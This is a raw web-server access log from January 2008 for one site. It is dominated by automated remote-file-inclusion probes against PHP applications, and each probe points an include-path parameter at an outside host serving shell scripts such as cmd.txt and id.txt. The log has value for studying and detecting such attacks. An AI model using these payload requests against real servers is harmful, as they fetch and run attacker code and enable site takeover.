66.249.67.25 - - [18/Jan/2008:11:59:42 -0800] "GET /minamijewelry/html/terms.html HTTP/1.1" 200 13534 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:11:59:55 -0800] "GET /logs/access.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:12:02:07 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:12:02:07 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:12:02:08 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.50.14.180 - - [18/Jan/2008:12:02:11 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.14.180 - - [18/Jan/2008:12:02:11 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.14.180 - - [18/Jan/2008:12:02:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:12:02:19 -0800] "GET ///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2963 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:12:02:22 -0800] "GET /logs///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 30688 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [18/Jan/2008:12:04:49 -0800] "GET /logs/access.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [18/Jan/2008:12:04:49 -0800] "GET //newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.240.103 - - [18/Jan/2008:12:04:49 -0800] "GET /logs//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.98.160 - - [18/Jan/2008:12:07:01 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:12:07:09 -0800] "GET /logs/!rfihttp://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 302 270 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:12:07:09 -0800] "GET /!rfihttp://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 302 265 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:12:07:09 -0800] "GET /@www.dmulk.com/logs/!rfihttp://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "s.p11.hostingprod.com"
64.34.161.42 - - [18/Jan/2008:12:07:09 -0800] "GET /@www.dmulk.com/!rfihttp://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "s.p11.hostingprod.com"
72.232.118.239 - - [18/Jan/2008:12:07:53 -0800] "GET /modifyform.html?code=ftp://82.43.165.174/Public/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:12:08:42 -0800] "GET /!rfihttp://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 302 265 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:12:08:42 -0800] "GET /logs/!rfihttp://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 302 270 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:12:08:42 -0800] "GET /@www.dmulk.com/!rfihttp://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "s.p11.hostingprod.com"
66.135.39.110 - - [18/Jan/2008:12:08:42 -0800] "GET /@www.dmulk.com/logs/!rfihttp://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 - "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "s.p11.hostingprod.com"
65.38.105.135 - - [18/Jan/2008:12:12:07 -0800] "GET //send_reminders.php?noSet=http://www.lindori.de//AdvancedGuestBook/.r/123456789.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:12:13:23 -0800] "GET /logs/access_071229.log///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:12:13:23 -0800] "GET ///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 2963 "-" "libwww-perl/5.808" "www.dmulk.com"
64.81.158.74 - - [18/Jan/2008:12:13:24 -0800] "GET /logs///?mosConfig_absolute_path=http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt?? HTTP/1.1" 200 30688 "-" "libwww-perl/5.808" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:12:13:52 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:12:13:53 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:12:13:53 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.32 - - [18/Jan/2008:12:14:14 -0800] "GET //send_reminders.php?noSet=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.118.239 - - [18/Jan/2008:12:16:26 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=ftp://82.43.165.174/Public/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:12:16:31 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:12:16:32 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:12:19:09 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:12:19:09 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:12:22:09 -0800] "GET /logs/access_071229.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:12:22:09 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:12:22:10 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.118.239 - - [18/Jan/2008:12:22:58 -0800] "GET /logs/access.log/modifyform.html?code=ftp://82.43.165.174/Public/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.118.239 - - [18/Jan/2008:12:22:58 -0800] "GET /logs/modifyform.html?code=ftp://82.43.165.174/Public/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [18/Jan/2008:12:23:07 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:12:23:13 -0800] "GET /logs/access_071216.log/modules/tinycontent/admin/index.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:12:23:13 -0800] "GET /modules/tinycontent/admin/index.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:12:23:13 -0800] "GET /logs/modules/tinycontent/admin/index.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.131.26 - - [18/Jan/2008:12:23:14 -0800] "GET /logs/access.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.118.239 - - [18/Jan/2008:12:24:48 -0800] "GET /logs/access_071224.log/modifyform.html?code=ftp://82.43.165.174/Public/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [18/Jan/2008:12:26:25 -0800] "GET /logs/access.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [18/Jan/2008:12:26:25 -0800] "GET //newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.14.194 - - [18/Jan/2008:12:26:25 -0800] "GET /logs//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.strider.we.bs/scan/cmd-scan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [18/Jan/2008:12:28:10 -0800] "GET /logs/access_071216.log/admin/editeur/spaw_control.class.php?spaw_root=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [18/Jan/2008:12:28:10 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.120.241.242 - - [18/Jan/2008:12:28:11 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.145.195 - - [18/Jan/2008:12:28:23 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.195 - - [18/Jan/2008:12:28:24 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
216.120.241.242 - - [18/Jan/2008:12:29:31 -0800] "GET /logs/access_071212.log/admin/editeur/spaw_control.class.php?spaw_root=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:12:29:45 -0800] "GET /logs/access.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:12:29:45 -0800] "GET //newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.10.250.90 - - [18/Jan/2008:12:29:45 -0800] "GET /logs//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.41.238.2 - - [18/Jan/2008:12:30:20 -0800] "GET /logs/access_071212.log/modules/tinycontent/admin/index.php?spaw_root=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.14.180 - - [18/Jan/2008:12:30:39 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.14.180 - - [18/Jan/2008:12:30:39 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.14.180 - - [18/Jan/2008:12:30:39 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:12:31:04 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:12:31:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.31.186.231 - - [18/Jan/2008:12:31:04 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [18/Jan/2008:12:31:31 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [18/Jan/2008:12:31:31 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [18/Jan/2008:12:31:32 -0800] "GET //skin/zero_vote/error.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [18/Jan/2008:12:31:32 -0800] "GET //skin/zero_vote/error.php?dir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [18/Jan/2008:12:31:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [18/Jan/2008:12:31:33 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [18/Jan/2008:12:32:06 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.crewfuck.kit.net/eval/safealba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.4.95.20 - - [18/Jan/2008:12:32:07 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://bobatka.info/modules/language/asc/asc/r7? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:12:33:28 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.106 - - [18/Jan/2008:12:33:29 -0800] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:12:37:04 -0800] "GET /logs/access_071228.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:12:37:04 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.100.191.98 - - [18/Jan/2008:12:37:04 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:37:40 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:37:40 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:37:40 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.140.252.66 - - [18/Jan/2008:12:37:42 -0800] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:12:38:30 -0800] "GET /logs/access_071230.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:12:38:31 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:12:38:31 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:39:17 -0800] "GET /logs/access_071230.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:39:17 -0800] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:39:17 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:12:40:48 -0800] "GET /logs/access_070720.log HTTP/1.0" 200 29646 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:41:23 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:41:23 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.58.82 - - [18/Jan/2008:12:41:23 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.154 - - [18/Jan/2008:12:41:31 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:41:41 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:41:42 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.144.64.50 - - [18/Jan/2008:12:41:42 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:12:43:56 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:12:43:57 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.1.130 - - [18/Jan/2008:12:43:57 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.50.15.90 - - [18/Jan/2008:12:44:00 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.50.15.90 - - [18/Jan/2008:12:44:01 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.50.15.90 - - [18/Jan/2008:12:44:01 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.118.239 - - [18/Jan/2008:12:44:30 -0800] "GET /logs/access_071229.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=ftp://82.43.165.174/Public/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.118.239 - - [18/Jan/2008:12:44:31 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=ftp://82.43.165.174/Public/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:44:47 -0800] "GET /logs/access_071230.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:44:47 -0800] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [18/Jan/2008:12:44:47 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.152.179.91 - - [18/Jan/2008:12:44:56 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:12:44:59 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:12:44:59 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.34.32.66 - - [18/Jan/2008:12:45:00 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.pag.it/images/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:12:47:01 -0800] "GET /logs/access_080101.log//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:12:47:03 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [18/Jan/2008:12:47:10 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:12:47:32 -0800] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
66.135.39.110 - - [18/Jan/2008:12:47:32 -0800] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:12:48:37 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [18/Jan/2008:12:48:37 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.boletinturistico.com:85/AdManagerPro/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
